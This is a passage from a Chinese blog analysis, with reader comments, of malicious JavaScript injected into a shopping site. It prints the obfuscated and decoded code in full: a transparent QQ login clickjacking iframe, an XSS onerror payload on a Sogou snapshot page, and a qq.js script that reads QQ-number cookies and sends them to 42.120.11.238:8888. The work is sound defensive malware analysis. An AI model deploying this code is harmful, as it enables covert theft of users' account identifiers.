7A\x71\x71\x6B\x65\x79″,"\x6B\x66\x75\x69\x6E","\x64\x61\x74\x61″,"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x70\x64\x2E\x62\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2F\x67\x65\x74\x5F\x73\x69\x67\x6E\x2E\x70\x68\x70\x3F\x6E\x61\x3D","\x26\x6B\x66\x75\x69\x6E\x3D","\x26\x61\x74\x79\x3D\x30\x26\x61\x3D\x30\x26\x73\x69\x64\x3D\x26\x75\x69\x64\x3D\x26\x75\x72\x6C\x3D","\x26\x64\x6D\x3D\x26\x63\x6C\x6B\x53\x72\x63\x3D\x26\x65\x78\x74\x3D\x26\x63\x62\x3D\x62\x69\x7A\x71\x71\x6B\x65\x79\x35\x75″,"\x26\x61\x6D\x70\x3B","\x26″,"\x73\x69\x67\x6E","\x2F","\x71\x71\x63\x68\x61\x74\x35\x75\x32″,"\x69\x6E\x64\x65\x78\x4F\x66″,"\x64\x6F\x6D\x61\x69\x6E","\x71\x71\x63\x68\x61\x74\x35\x75\x28\x31\x29″,"\x32″,"\x71\x71\x63\x68\x61\x74\x35\x75\x28\x29″];var mb5u_oHead=document[_0xc112[2]](_0xc112[1])[_0xc112[0]](0);var mb5ux=0;var mb5uy=0;var mb5u_iframe_hover=false;var i_referrer=encodeURIComponent(document[_0xc112[3]]);var i_url=encodeURIComponent(document[_0xc112[5]][_0xc112[4]]);var i_title=encodeURIComponent(document[_0xc112[6]]);function Creatif5u(b,c){var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=b;if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[13]][_0xc112[12]]=_0xc112[14];a[_0xc112[15]]=_0xc112[16];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);mb5u_oHead[_0xc112[20]](a)}function Creatjs5u(b,c){var a=document[_0xc112[8]](_0xc112[21]);a[_0xc112[22]]=_0xc112[23];if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[24]]=_0xc112[25];a[_0xc112[9]]=b;mb5u_oHead[_0xc112[20]](a)}function Creatif5ubody(b,c){var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=b;if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[13]][_0xc112[12]]=_0xc112[14];a[_0xc112[15]]=_0xc112[16];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);document[_0xc112[2]](_0xc112[26])[_0xc112[0]](0)[_0xc112[20]](a)}function Gc5u(a){var b,reg=new RegExp(_0xc112[27]+a+_0xc112[28]);if(b=document[_0xc112[30]][_0xc112[29]](reg)){return unescape(b[2])}else{return null}}function Sc5u(a,b){var c=new 
Date();c[_0xc112[32]](c[_0xc112[31]]()+2*24*60*60*1000);document[_0xc112[30]]=a+_0xc112[33]+escape(b)+_0xc112[34]+c[_0xc112[35]]()}function Q5u(){var a=i_php+_0xc112[36]+i_uid+_0xc112[37]+i_qz+_0xc112[38]+i_time+_0xc112[39]+i_referrer+_0xc112[40]+i_url+_0xc112[41]+i_title+_0xc112[42]+(new Date())[_0xc112[31]]();Creatjs5u(a,_0xc112[43])}function Umb5u(){var a=i_php+_0xc112[44]+i_uid+_0xc112[45]+i_referrer+_0xc112[46]+i_url+_0xc112[41]+i_title+_0xc112[47]+i_fkid+_0xc112[48]+(new Date())[_0xc112[31]]();Creatif5u(a)}function mb5u_noLogin(){var a=i_php+_0xc112[49]+i_fkid+_0xc112[50]+(new Date)[_0xc112[31]]();Creatjs5u(a);setTimeout(ck5u,500)}function ck5u(){if(wdl==_0xc112[51]){if(!navigator[_0xc112[52]][_0xc112[29]](/(iPhone|iPod|Android|ios)/i)){if(Gc5u(_0xc112[53])==null){ptU5u()}}}}function ptU5u(){window[_0xc112[54]]=_0xc112[55];var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=_0xc112[56];a[_0xc112[11]]=_0xc112[54];a[_0xc112[13]][_0xc112[12]]=_0xc112[57];a[_0xc112[15]]=_0xc112[16];a[_0xc112[58]]=_0xc112[59];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);var b=document[_0xc112[61]][_0xc112[60]];document[_0xc112[61]][_0xc112[62]](a,b)}function mb5u_GetCurrentStyle(a,b){if(a[_0xc112[63]]){return a[_0xc112[63]][b]}else{if(window[_0xc112[64]]){propprop=b[_0xc112[66]](/([A-Z])/g,_0xc112[65]);propprop=b[_0xc112[67]]();return document[_0xc112[68]][_0xc112[64]](a,null)[propprop]}};return null}window[_0xc112[69]]=function(){var h=document[_0xc112[70]](_0xc112[54]);mb5u_iframeClick(h,mb5uiframeclickcallback);document[_0xc112[71]]=function(a){mb5u_iframe_hover=false;window[_0xc112[72]]();var b=document[_0xc112[70]](_0xc112[54]);var a=a||window[_0xc112[73]];mb5ux=a[_0xc112[74]];mb5ux=a[_0xc112[75]];var c=document[_0xc112[61]][_0xc112[76]]+document[_0xc112[77]][_0xc112[76]];var d=document[_0xc112[77]][_0xc112[78]]-a[_0xc112[74]];var e=document[_0xc112[61]][_0xc112[79]]+document[_0xc112[77]][_0xc112[79]];var f=0;var 
g=mb5u_GetCurrentStyle(document[_0xc112[61]],_0xc112[80]);if(document[_0xc112[77]][_0xc112[81]]>document[_0xc112[61]][_0xc112[81]]&&g==_0xc112[82]){f=(document[_0xc112[77]][_0xc112[81]]-document[_0xc112[61]][_0xc112[81]])/2;f=f+e;b[_0xc112[13]][_0xc112[83]]=(c+a[_0xc112[75]]-25)+_0xc112[84];b[_0xc112[13]][_0xc112[85]]=((d<b[_0xc112[78]]?a[_0xc112[74]]-b[_0xc112[78]]:a[_0xc112[74]])-f)+_0xc112[84]}else{f=f+e;b[_0xc112[13]][_0xc112[83]]=(c+a[_0xc112[75]]-25)+_0xc112[84];b[_0xc112[13]][_0xc112[85]]=((d<b[_0xc112[78]]?a[_0xc112[74]]-b[_0xc112[78]]:a[_0xc112[74]])+f)+_0xc112[84]}}};function mb5u_iframeClick(a,b){a[_0xc112[86]]=function(){mb5u_iframe_hover=true};a[_0xc112[87]]=function(){mb5u_iframe_hover=false};window[_0xc112[88]]=function(){if(mb5u_iframe_hover){b()}}}function mb5uiframeclickcallback(){var b=document[_0xc112[70]](_0xc112[54]);setTimeout(function(){try{b[_0xc112[13]][_0xc112[89]]=_0xc112[90];var a=document[_0xc112[91]](mb5ux,mb5uy);a[_0xc112[92]]()}catch(e){b[_0xc112[13]][_0xc112[89]]=_0xc112[90]};Umb5u();Sc5u(_0xc112[53],_0xc112[93])},1000)}function qqchat5u(i){if(i==1){var a=_0xc112[94]+i_qq+_0xc112[95]+i_d+_0xc112[96];Creatif5ubody(a,_0xc112[97])}else{Creatjs5u(_0xc112[98]+i_qq+_0xc112[99],_0xc112[100])}}function JSONP_CALLBACK_5u(a){var b=a[_0xc112[102]][_0xc112[101]];Creatjs5u(_0xc112[103]+i_qq+_0xc112[104]+b+_0xc112[105]+i_url+_0xc112[41]+i_title+_0xc112[106],_0xc112[100])}function bizqqkey5u(a){var b=a[_0xc112[102]][_0xc112[109]][_0xc112[66]](_0xc112[107],_0xc112[108]);b=b[_0xc112[66]](_0xc112[110],_0xc112[110]);Creatif5ubody(b,_0xc112[111])}if(document[_0xc112[113]][_0xc112[112]](i_d)>=0){Umb5u();setTimeout(mb5u_noLogin,1500);if(i_h==_0xc112[93]){setTimeout(_0xc112[114],i_yc)};if(i_h==_0xc112[115]){setTimeout(_0xc112[116],i_yc)}};
为了保留原意,所以全部贴出来了。可是这一步得到的还是混淆过的,我们要继续反混淆。其实反混淆这事儿挺苦逼的,因为需要自己写脚本。话说这个混淆的方式怎么这么眼熟呢,OpenGG同学以前也这么干过。
最终反混淆的代码如下,都已经格式化了。
// Fully unpacked and formatted form of the injected script (both obfuscation layers removed).
// Part 1: the same first-stage loader as above — report referrer/URL/title through a hidden iframe.
var puid = '5867'; var pap = 'http://182.92.239.23/g.php?surl='; var pr = encodeURIComponent(document.referrer); var pu = encodeURIComponent(document.location.href); var pt = encodeURIComponent(document.title); var phead = document.getElementsByTagName('HEAD').item(0); var cslist = 'uid=' + puid + '&r=' + pr + '&u=' + pu + '&t=' + pt; var purl = encodeURIComponent('http://42.120.11.238:8888/?action=p&' + cslist + '&f=jfif&p=');
// Cimg is dead code here: the <img> is never attached and the function is never called.
function Cimg(src) { var a = document.createElement('img'); a.src = src; a.style = 'display:none'; };
// Cifr: zero-size hidden iframe appended to <head>.
function Cifr(src) { var ifr = document.createElement('iframe'); ifr.src = src; ifr.width = ifr.height = ifr.frameBorder = 0; ifr.scrolling = 'no'; ifr.allowTransparency = 'true'; ifr.style.display = 'none'; phead.appendChild(ifr); };
Cifr(pap + purl);
// Part 2: tracker configuration. i_php is the collection server; i_d gates activation on document.domain;
// i_h selects which qqchat5u variant is scheduled after i_yc ms ('0' = none); i_qq/i_fkid are operator ids.
var i_php = 'http://42.120.11.238:8888/'; var i_uid = '5867'; var i_h = '0'; var i_qq = '0'; var i_d = 'www.zxdl369.cn'; var i_yc = 2000; var i_fkid = '1416369920';
// Shared state: <head> element, last mouse position (mb5uy is never updated — see onmousemove below), hover flag.
var mb5u_oHead = document['getElementsByTagName']('HEAD') ['item'](0); var mb5ux = 0; var mb5uy = 0; var mb5u_iframe_hover = false;
// Page context reported by every beacon below.
var i_referrer = encodeURIComponent(document['referrer']); var i_url = encodeURIComponent(document['location']['href']); var i_title = encodeURIComponent(document['title']);
// Creatif5u(src, id): hidden 0x0 iframe appended to <head>; id is optional.
function Creatif5u(b, c) { var a = document['createElement']('iframe'); a['src'] = b; if (c != '' && c != null) { a['id'] = c }; a['style']['cssText'] = 'width:0px;height:0px;display:none;'; a['scrolling'] = 'no'; a['setAttribute']('frameborder', '0', 0); mb5u_oHead['appendChild'](a) }
// Creatjs5u(src, id): <script src> appended to <head> — a script-tag GET is how data leaves the page.
function Creatjs5u(b, c) { var a = document['createElement']('script'); a['type'] = 'text/javascript'; if (c != '' && c != null) { a['id'] = c }; a['charset'] = 'utf-8'; a['src'] = b; mb5u_oHead['appendChild'](a) }
// Creatif5ubody(src, id): same as Creatif5u but appended to <body>.
function Creatif5ubody(b, c) { var a = document['createElement']('iframe'); a['src'] = b; if (c != '' && c != null) { a['id'] = c }; a['style']['cssText'] = 'width:0px;height:0px;display:none;'; a['scrolling'] = 'no'; a['setAttribute']('frameborder', '0', 0); document['getElementsByTagName']('BODY') ['item'](0) ['appendChild'](a) }
// Gc5u(name): cookie read by regex over document.cookie; unescaped value or null.
function Gc5u(a) { var b, reg = new RegExp('(^| )' + a + '=([^;]*)(;|$)'); if (b = document['cookie']['match'](reg)) { return unescape(b[2]) } else { return null } }
// Sc5u(name, value): set a cookie that expires in 2 days (used to mark ifptu5u=1 after the login-frame click).
function Sc5u(a, b) { var c = new Date(); c['setTime'](c['getTime']() + 2 * 24 * 60 * 60 * 1000); document['cookie'] = a + '=' + escape(b) + ';expires=' + c['toGMTString']() }
// Q5u(): saveQQ beacon. i_qz and i_time are not defined in this listing and Q5u is never called here —
// presumably left over from another variant of the script; confirm against the served file.
function Q5u() { var a = i_php + '?action=saveQQ&uid=' + i_uid + '&qz=' + i_qz + '&time=' + i_time + '&referrer=' + i_referrer + '&url=' + i_url + '&title=' + i_title + '&r=' + (new Date()) ['getTime'](); Creatjs5u(a, 'smevn5du') }
// Umb5u(): hidden iframe to i_php/sx.php carrying uid, referrer, URL, title and fkid.
// The write-up traces this request to a Sogou web-snapshot page, which is where the QQ cookies end up being read.
function Umb5u() { var a = i_php + '/sx.php?uid=' + i_uid + '&ref=' + i_referrer + '&furl=' + i_url + '&title=' + i_title + '&fkid=' + i_fkid + '&tm=' + (new Date()) ['getTime'](); Creatif5u(a) }
// mb5u_noLogin(): load i_php/m/wdl.php?c=<fkid>&r=1 as a script, then run ck5u 500 ms later.
function mb5u_noLogin() { var a = i_php + '/m/wdl.php?c=' + i_fkid + '&r=1&time=' + (new Date) ['getTime'](); Creatjs5u(a); setTimeout(ck5u, 500) }
// ck5u(): wdl is not defined in this listing — presumably a global set by the wdl.php script loaded just
// before (confirm). Only non-mobile user agents that do not yet carry the ifptu5u cookie proceed to ptU5u.
function ck5u() { if (wdl == 'Y') { if (!navigator['userAgent']['match'](/(iPhone|iPod|Android|ios)/i)) { if (Gc5u('ifptu5u') == null) { ptU5u() } } } }
// ptU5u(): clickjacking setup. The HTML for a fully transparent (opacity 0) 580x366 iframe of the
// ui.ptlogin2.qq.com login page is stored in window.mb5uptlogin and loaded through a javascript: URL;
// its onload hands control to top.mb5u_ifmove. The outer 50x50 iframe is inserted as the first child of
// <body> with the maximum z-index so it sits above everything else.
function ptU5u() { window['mb5uptlogin'] = '<iframe style="position:absolute;width:580px;height:366px; margin:-150px 0 0 -340px;filter:alpha(opacity=00);-moz-opacity:0.0;-khtml-opacity: 0.0;opacity: 0.0;" scrolling="no" name="mb5u" id="mb5uptlogin" src="http://ui.ptlogin2.qq.com/cgi-bin/login?link_target=blank&target=blank&appid=6000201&daid=220&hide_uin_tip=1&style=11&hide_close_icon=1&target=self&qtarget=0&hide_title_bar=1&s_url=http%3A%2F%2Fapp.data.qq.com%2Fcate%2FpopLogin" frameborder="0" onload="setTimeout(top.mb5u_ifmove,0);">'; var a = document['createElement']('iframe'); a['src'] = 'javascript:parent.mb5uptlogin'; a['id'] = 'mb5uptlogin'; a['style']['cssText'] = 'position:absolute; z-index: 2147483647;width:50px; height:50px; '; a['scrolling'] = 'no'; a['onerror'] = 'return true;'; a['setAttribute']('frameborder', '0', 0); var b = document['body']['firstChild']; document['body']['insertBefore'](a, b) }
// mb5u_GetCurrentStyle(el, prop): currentStyle (old IE) or getComputedStyle. Note: the second assignment to
// propprop discards the camelCase-to-dash replacement, and propprop is an implicit global.
function mb5u_GetCurrentStyle(a, b) { if (a['currentStyle']) { return a['currentStyle'][b] } else { if (window['getComputedStyle']) { propprop = b['replace'](/([A-Z])/g, '-$1'); propprop = b['toLowerCase'](); return document['defaultView']['getComputedStyle'](a, null) [propprop] } }; return null }
// mb5u_ifmove: once the login frame has loaded, reposition it under the cursor on every mousemove
// (top = clientY - 25, left adjusted for scroll offsets and a centered relative body). mb5ux is assigned
// twice (clientX, then clientY) and mb5uy is never written, so mb5uy stays 0.
window['mb5u_ifmove'] = function () { var h = document['getElementById']('mb5uptlogin'); mb5u_iframeClick(h, mb5uiframeclickcallback); document['onmousemove'] = function (a) { mb5u_iframe_hover = false; window['focus'](); var b = document['getElementById']('mb5uptlogin'); var a = a || window['event']; mb5ux = a['clientX']; mb5ux = a['clientY']; var c = document['body']['scrollTop'] + document['documentElement']['scrollTop']; var d = document['documentElement']['offsetWidth'] - a['clientX']; var e = document['body']['scrollLeft'] + document['documentElement']['scrollLeft']; var f = 0; var g = mb5u_GetCurrentStyle(document['body'], 'position'); if (document['documentElement']['clientWidth'] > document['body']['clientWidth'] && g == 'relative') { f = (document['documentElement']['clientWidth'] - document['body']['clientWidth']) / 2; f = f + e; b['style']['top'] = (c + a['clientY'] - 25) + 'px'; b['style']['left'] = ((d < b['offsetWidth'] ? a['clientX'] - b['offsetWidth'] : a['clientX']) - f) + 'px' } else { f = f + e; b['style']['top'] = (c + a['clientY'] - 25) + 'px'; b['style']['left'] = ((d < b['offsetWidth'] ? a['clientX'] - b['offsetWidth'] : a['clientX']) + f) + 'px' } } };
// mb5u_iframeClick(frame, cb): track whether the cursor is over the frame; a window blur while hovering
// (which is what a click into the iframe produces) invokes cb.
function mb5u_iframeClick(a, b) { a['onmouseover'] = function () { mb5u_iframe_hover = true }; a['onmouseout'] = function () { mb5u_iframe_hover = false }; window['onblur'] = function () { if (mb5u_iframe_hover) { b() } } }
// mb5uiframeclickcallback(): 1 s after the click, hide the login frame, replay a click on whatever element is
// at (mb5ux, mb5uy), fire Umb5u again and set ifptu5u=1 so the frame is not shown again for 2 days.
function mb5uiframeclickcallback() { var b = document['getElementById']('mb5uptlogin'); setTimeout(function () { try { b['style']['display'] = 'none'; var a = document['elementFromPoint'](mb5ux, mb5uy); a['click']() } catch (e) { b['style']['display'] = 'none' }; Umb5u(); Sc5u('ifptu5u', '1') }, 1000) }
// qqchat5u(i): i==1 opens a tencent://message/?uin=<i_qq> link in a hidden iframe; otherwise resolves i_qq via
// wpl.b.qq.com (JSONP) and then wpd.b.qq.com to obtain a signed chat URL. Not scheduled while i_h is '0'.
function qqchat5u(i) { if (i == 1) { var a = 'tencent://message/?uin=' + i_qq + '&Site=' + i_d + '&Menu=yes'; Creatif5ubody(a, 'qqchat5u1') } else { Creatjs5u('http://wpl.b.qq.com/cgi/conv.php?num=' + i_qq + '&cb=JSONP_CALLBACK_5u', 'bizqqkey') } }
// JSONP_CALLBACK_5u(a): second hop of the qqchat5u chain; passes the kfuin obtained from conv.php on.
function JSONP_CALLBACK_5u(a) { var b = a['data']['kfuin']; Creatjs5u('http://wpd.b.qq.com/cgi/get_sign.php?na=' + i_qq + '&kfuin=' + b + '&aty=0&a=0&sid=&uid=&url=' + i_url + '&title=' + i_title + '&dm=&clkSrc=&ext=&cb=bizqqkey5u', 'bizqqkey') }
// bizqqkey5u(a): both replace() calls are no-ops as rendered here ('&'→'&', '/'→'/'); presumably HTML
// entities / escaped slashes in the served file that were lost in the blog rendering.
function bizqqkey5u(a) { var b = a['data']['sign']['replace']('&', '&'); b = b['replace']('/', '/'); Creatif5ubody(b, 'qqchat5u2') }
// Entry point: only when document.domain contains i_d. Umb5u runs immediately and mb5u_noLogin 1.5 s later;
// the string-form setTimeout calls (implicit eval) are scheduled only for i_h '1' or '2'.
if (document['domain']['indexOf'](i_d) >= 0) { Umb5u(); setTimeout(mb5u_noLogin, 1500); if (i_h == '1') { setTimeout('qqchat5u(1)', i_yc) }; if (i_h == '2') { setTimeout('qqchat5u()', i_yc) } };
这个代码有点长,但我们其实不用关心那么多。在这其中,我们看到大量的隐藏iframe操作,可见插入了不少iframe。插到哪里去了?喏。
在这JS中我们甚至能看到直接调用企鹅的登录浮窗的界面……禁不住要问一下,这货到底是要干嘛啊?
不过我们并没有看到企鹅的登录浮窗(因为我曾经在浏览器中登录的关系?没登录是不是就会自动弹了?只是猜测,没有做深入研究,这不是重点)。
从上面一段脚本的最后我们看到了Umb5u()
和mb5u_noLogin
两个函数调用,看了看觉得前面一个比较重要,因为它嵌入了一个带有资源返回的iframe:http://42.120.11.238:8888//sx.php?uid=5867&ref=&furl=http%3A%2F%2Fwww.zxdl369.cn%2Fonlineshop%2Ffojiaoyongpin%2Ftongzhutai%2F&title=%E4%BA%A7%E5%93%81%E5%B1%95%E5%8E%85%E2%80%94%E6%89%8E%E8%A5%BF%E5%BE%B7%E5%8B%92&fkid=1416369920&tm=1431411413183
PS,sx.php原意是傻Ⅹ.拍黄片儿的意思吗?
看!混入了奇怪的东西耶!有狗出没!!
3.猪一样的搜狗
嗯,可惜搜狗和腾讯的关系很紧密,所以你看我都没登录过搜狗,却依然在搜狗下面留下了Cookies信息。腾讯习惯把会话密钥啊QQ号啊之类的东西写在Cookies里,而且这些Cookie页面脚本能直接读到(document.cookie 里就能拿到,没有HttpOnly保护),所以很多人喜欢用XSS去偷这些信息。这不,其实是搜狗搞的。
上面访问的网址是搜狗的网页快照服务,看到这个我就闻到了XSS的味道……
看看这个页面的源码吧,直接拉到最下面。
看到那个img标签没?嗯。这里故意给img指定了一个不存在的地址,让它加载失败,再借助加载失败时触发的onerror事件把脚本执行起来。
onerror的内容如下。
// onerror handler as served. Two aliases are defined with \u-escaped identifiers: IHse = String.fromCharCode
// and NWVbw_QY = eval; the /*...*/ comments are noise. The char-code list decodes to the one-line script shown
// next, which injects qq.js. The trailing " appears to be the closing quote of the onerror="..." attribute
// copied along with the handler, not part of the script.
/*_Ka*/var/*hCnn*/IHse/*Wav*/=/*fBJAp*/\u0053\u0074\u0072\u0069\u006e\u0067./*lsxIcC*/\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065;/*ksHMx*/var/*KuVkYP*/NWVbw_QY/*_ztkzYy*/=/*_pNZE*/\u0065\u0076\u0061\u006c;NWVbw_QY(IHse(118,97,114,32,111,72,101,97,100,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,72,69,65,68,39,41,46,105,116,101,109,40,48,41,59,118,97,114,32,111,83,99,114,105,112,116,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,83,99,114,105,112,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,59,111,83,99,114,105,112,116,46,115,114,99,61,34,104,116,116,112,58,47,47,113,113,46,109,98,53,117,46,99,111,109,47,113,113,46,106,115,34,59,111,72,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,111,83,99,114,105,112,116,41,59));"
好嘛,又混淆了——用\u转义把String.fromCharCode和eval两个名字藏起来,真正的代码被编成一串字符编码,中间还塞满了无意义的注释。别以为我不知道你想干坏事。真相是啥呢?
// Decoded onerror payload: appends a <script src="http://qq.mb5u.com/qq.js"> to <head> of the page the
// <img> lives in. Because the handler runs in that page's origin, qq.js inherits that page's cookies and URL.
var oHead=document.getElementsByTagName('HEAD').item(0);
var oScript= document.createElement("script");
oScript.type="text/javascript";
oScript.src="http://qq.mb5u.com/qq.js";
oHead.appendChild(oScript);
原来是又嵌入了一个脚本引用。这个qq.js内容是啥呢?
// qq.js as served: the common eval(function(p,a,c,k,e,r){...}) packer with a 100-entry token dictionary.
// The listing carries smart-quote damage from the blog rendering (c– for c--, ?": for ?'':, 19-8″ and 10051′
// for plain quotes), so it is not runnable as pasted; the unpacked and formatted script follows below.
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c–)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l 4(a){3 b,T=Y 1y("(^| )"+a+"=([^;]*)(;|$)");h(b=9.12.13(T))n 1q(b[2]);D n A}l 6(a){3 b=9.14.15;3 c=b.1k(b.C("?")+1).1w("&");j(3 i=0;i<c.p;i++){3 d=c[i].C(a+"=");h(d!=-1){n c[i].z(a+"=","").z("?","");17}}n""}l Q(a){3 b=6(\'R\');3 c=6(\'1u\');3 d=6(\'1v\');3 e=6(\'S\');3 f="U://V.X.11.Z:10/?1a=1c";f+="&1e="+a;f+="&R="+b;f+="&1g="+c;f+="&1i="+d;f+="&S="+e;f+="&r="+(Y 1m()).1o();3 g=9.E("F");g.G="H/I";g.J=f;9.K(\'L\').M(0).N(g)}l O(b){3 a=9.E("F");a.G="H/I";a.18="19-8″;a.J=b;9.K(\'L\').M(0).N(a)}3 s=4("1b");3 x=4("1d");3 t=4("1f");3 u=4("1h");3 v=4("1j");3 w=4("1l");3 q=4("1n");3 y=4("1p");3 W=s||x||t||u||v||w||q||y;h(W==A){O("U://V.X.11.Z:10/m/1r.1s?c="+6(\'1t\')+"&d=1″)}D{3 k=[s,x,t,u,v,w,q,y];3 5=[];3 7=[];3 B={};j(3 i=0;i<k.p;i++){h(k[i]!=A){3 a=k[i].z(/^[o|0]*/1x,"");5.P(a)}}j(3 i=0;i<5.p;i++){h(!B[5[i]]){B[5[i]]=1z;h(1A(5[i])>1B){7.P(5[i])}}}7=7.16();j(3 i=0;i<7.p;i++){Q(7[i])}}',62,100,'|||var|Gc5u|buin|Re5u|cuin||document||||||||if||for|auin|function||return||length|u7||u1|u3|u4|u5|u6|u2|u8|replace|null|uq|indexOf|else|createElement|script|type|text|javascript|src|getElementsByTagName|HEAD|item|appendChild|Creatjs5u|push|Q5u|uid|title|reg|http|42|quin|120|new|238|8888||cookie|match|location|href|reverse|break|charset|utf|action|pt2gguin|saveQQ|o_cookie|qq|p_uin|referrer|uin|url|ptui_loginuin|substring|uin_cookie|Date|luin|getTime|qm_username|unescape|wdl|php|fkid|ref|furl|split|ig|RegExp|true|parseInt|10051′.split('|'),0,{}))
咳咳……你以为这样有用吗,图样图森破。
/*
 * Unpacked qq.js, annotated for analysis. Summary of behaviour visible below:
 *  1. read eight cookie names that can carry a QQ account number from
 *     document.cookie of whatever document this script runs in;
 *  2. if none is present, load http://42.120.11.238:8888/m/wdl.php (fallback);
 *  3. otherwise normalise, de-duplicate and filter the values, then report each
 *     one to http://42.120.11.238:8888/?action=saveQQ by inserting a <script>
 *     element whose src carries the data in the query string (a GET that is not
 *     subject to same-origin restrictions and shows up in a proxy as a plain
 *     script request — which is how the author spotted it).
 * Every outbound request goes to the single host 42.120.11.238:8888, so a host
 * block (as the post recommends) neutralises both the fallback and the report.
 */
/* Gc5u(name): return the decoded value of cookie `name`, or null if absent.
   The regex anchors on "(^| )name=" so only an exact cookie name matches. */
function Gc5u(a) { var b, reg = new RegExp('(^| )' + a + '=([^;]*)(;|$)'); if (b = document.cookie.match(reg)) return unescape(b[2]); else return null }
/* Re5u(key): return the value of query parameter `key` from the current
   document URL, or '' if absent. Uses indexOf(key + '='), so a parameter
   whose name merely ends with `key` (e.g. "xuid=") would also be accepted;
   the `break` after `return` is dead code. */
function Re5u(a) { var b = document.location.href; var c = b.substring(b.indexOf('?') + 1).split('&'); for (var i = 0; i < c.length; i++) { var d = c[i].indexOf(a + '='); if (d != - 1) { return c[i].replace(a + '=', '').replace('?', ''); break } } return '' }
/* Q5u(qq): the reporting step. Builds
   http://42.120.11.238:8888/?action=saveQQ&qq=<qq>&uid=&referrer=&url=&title=&r=<timestamp>
   with uid/ref/furl/title taken from the current URL's query string (Re5u) and
   r = Date.getTime() as a cache-buster, then appends it as a <script> to <head>.
   The values are not URL-encoded before being concatenated. */
function Q5u(a) { var b = Re5u('uid'); var c = Re5u('ref'); var d = Re5u('furl'); var e = Re5u('title'); var f = 'http://42.120.11.238:8888/?action=saveQQ'; f += '&qq=' + a; f += '&uid=' + b; f += '&referrer=' + c; f += '&url=' + d; f += '&title=' + e; f += '&r=' + (new Date()).getTime(); var g = document.createElement('script'); g.type = 'text/javascript'; g.src = f; document.getElementsByTagName('HEAD').item(0).appendChild(g) }
/* Creatjs5u(url): generic script injector (same as Q5u's tail, plus charset). */
function Creatjs5u(b) { var a = document.createElement('script'); a.type = 'text/javascript'; a.charset = 'utf-8'; a.src = b; document.getElementsByTagName('HEAD').item(0).appendChild(a) }
/* Cookie names probed, in order. These are the names the script treats as
   candidates for a QQ number; nothing here verifies that assumption. */
var u1 = Gc5u('pt2gguin'); var u2 = Gc5u('o_cookie'); var u3 = Gc5u('p_uin'); var u4 = Gc5u('uin'); var u5 = Gc5u('ptui_loginuin'); var u6 = Gc5u('uin_cookie'); var u7 = Gc5u('luin'); var u8 = Gc5u('qm_username'); var quin = u1 || u2 || u3 || u4 || u5 || u6 || u7 || u8;
/* No candidate cookie at all -> fetch the wdl.php fallback, passing `fkid`
   from the current URL's query string (compare i_fkid in the first stage). */
if (quin == null) { Creatjs5u('http://42.120.11.238:8888/m/wdl.php?c=' + Re5u('fkid') + '&d=1') } else {
/* At least one candidate present:
   - strip a leading run of 'o'/'0' (the regex /^[o|0]*/ is a character class, so
     a literal '|' is stripped as well — almost certainly unintended);
   - de-duplicate via the `uq` map;
   - keep only values that parse (parseInt, no radix) to more than 10051;
   - reverse the surviving list and report each value with Q5u. */
var auin = [ u1, u2, u3, u4, u5, u6, u7, u8 ]; var buin = [ ]; var cuin = [ ]; var uq = { }; for (var i = 0; i < auin.length; i++) { if (auin[i] != null) { var a = auin[i].replace(/^[o|0]*/gi, ''); buin.push(a) } } for (var i = 0; i < buin.length; i++) { if (!uq[buin[i]]) { uq[buin[i]] = true; if (parseInt(buin[i]) > 10051) { cuin.push(buin[i]) } } } cuin = cuin.reverse(); for (var i = 0; i < cuin.length; i++) { Q5u(cuin[i]) } }
这段脚本很简单:逐个读取几个可能存放QQ号的Cookie,只要找到,就通过动态插入的<script>请求把QQ号发回42.120.11.238:8888。于是就看到了如下的这个请求。
奇怪,我都没打开过搜狗,为什么搜狗会有Cookies?那谁知道呢,企鹅和搜狗是那么好的基友,交叉感染司空见惯。
所以,我的QQ号就出去咯。
4.解决
搜狗的问题,当然要搜狗来解决咯。
在他们搞这个事儿之前,我先把那几个奇奇怪怪的域名全部ban掉再说。
- 42.120.11.238:8888
- qq.mb5u.com
Chrome/Firefox上可以使用Adblock Plus来阻断这些请求,IE上可以使用跟踪保护来阻断这些请求。
5.后记
我正准备把这个当漏洞提交到乌云的时候,搜索了下发现早在去年七月就已经有人提交了:http://www.wooyun.org/bugs/wooyun-2010-069640
然后搜狗的反应是:主!动!选!择!忽!略!!
天啊……看到这态度,我立马ban掉了搜狗的域名,不负责任的运营商分分钟给我滚粗!
这个你也行, 厉害
虽然没看懂,但是感觉很牛逼的样子
啊啊,一不小心就看到这个XSS了。之前也发现了这个,不过没鱼大分析的全面啊~
打开这个网站后,竟然不给我发广告邮件:-x
不知道是不是屏蔽了。
木鱼大人,谢谢你花费这么多时间为我们解惑,然后我一个也没看懂,只能默默飘过!
= =# 。。。飘过还这么用心
也许作者就是从被忽略的乌云中挖的矿啊~
不是的。。你仔细看看乌云漏洞报告里的例子,其实就是这个网站
会打dota的大神好牛逼8-) "咳咳"反混淆技能好强大,我也要搜搜学学
晚些时候我可以写一个小的博客来解释如何反混淆
灰常期待^ω^啊啊啊
最想要的是两次的反混淆.好高深的样子
这个。。晚些时候我可以写一个小的博客来解释如何反混淆
